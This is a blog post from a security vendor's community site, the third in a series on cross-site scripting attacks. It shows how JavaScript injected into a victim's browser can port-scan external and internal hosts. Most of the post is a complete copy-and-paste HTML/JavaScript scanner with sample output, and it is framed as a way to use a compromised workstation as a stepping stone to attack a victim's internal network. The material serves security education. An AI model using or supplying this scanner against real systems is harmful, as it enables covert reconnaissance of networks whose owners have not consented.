Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog

Getting Sassy With XSS Part III – Port Scanning

Created: 20 Aug 2012 • Updated: 11 Nov 2013
Vince Kornacki's picture
+7 7 Votes
Login to vote

In our last installment we examined the exploitation of cross-site scripting (XSS) to launch phishing attacks in order to steal application usernames and passwords. That was nifty. But what if you want to use the victim's workstation as a stepping stone to attack other systems? Is there anything left in our bag of tricks? You bet there is!
 
The "document.createElement()" DOM method allows JavaScript to create a new element node. The following JavaScript code therefore creates a new JavaScript object:
 
var newScript = document.createElement('script');
 
Now here comes the magic. We need to set the source of the "newScript" object. For example, a valid source script would look something like this:
 
newScript.src = 'http://www.application.com/scripts/valid.js'
 
However, we are not interested in some boring valid source script; we are interested in port scanning! So let's consider two distinct cases. The first case is an open port. For example, the following source script references a known open port:
 
newScript.src = 'http://www.google.com:80/'
 
This source script reference will connect to TCP port "80" on the server "www.google.com", and will therefore return data as the network connection is successful. However, the data will not be valid JavaScript so either the error message "Script error" or the error message "Error loading script" will be thrown. On the other hand, the following source script references a known closed port:
 
newScript.src = 'http://www.google.com:99/'
 
This source script reference will connect to TCP port "99" on the server "www.google.com" and will therefore not return data since the network connection is unsuccessful. Therefore no error message will be thrown. Are the gears turning? Do you smell what the Rock is cooking? The Rock smells a bowl of delicious port scan soup!
 
The "window.onerror" DOM object allows us to specify a function that will be automatically called whenever an error message is thrown:
 
window.onerror = handleError;
 
The "handleError" function will then test for the presence of the "Script error" or "Error loading script" error messages. If one of the error messages was thrown the port is open; otherwise the port is closed. And the beauty of this port scanner is that internal hosts can be scanned as well. That's right, the compromised workstation can be used a stepping stone to attack systems on the victim's internal network! But as always, do not take my word for it. Copy and paste the following content into a local file:
 
<html>
<body>
<script>
window.onerror = handleError;
function doPortscan()
{
  var host = document.formPortscan.host.value;
  var port = document.formPortscan.port.value;
  document.getElementById("divOutput").innerHTML += '<br />Scanning host "' + host + '" port "' + port + '"...';
  var newScript = document.createElement('script');
  newScript.src = 'http://' + host + ':' + port;
  document.body.appendChild(newScript);
}
function handleError(message, url, line)
{
  if(message.match(/Script error|Error loading script/))
  {
    document.getElementById("divOutput").innerHTML += "OPEN!";
  }
}
</script>
<form name="formPortscan" onsubmit="return false;">
<table>
<tr>
<td>Host:</td>
<td><input type="text" name="host"></td>
</tr>
<tr>
<td>Port:</td>
<td><input type="text" name="port"></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Portscan" onclick="doPortscan();" /></td>
</tr>
</table>
</form>
<div id="divOutput"></div>
</body>
</html>
 
Enter the target "Host" and "Port" combination and click "Portscan" to get the party started! If the string "OPEN!" is returned the port is open:
 
Scanning host "www.google.com" port "80"...OPEN!
 
If the string "OPEN!" is not returned the port is closed:
 
Scanning host "www.google.com" port "99"...
 
The port scanner works like a charm for both external and internal systems! You want fries with that luscious port scanning sandwich? BAM!

Blog Entry Filed Under: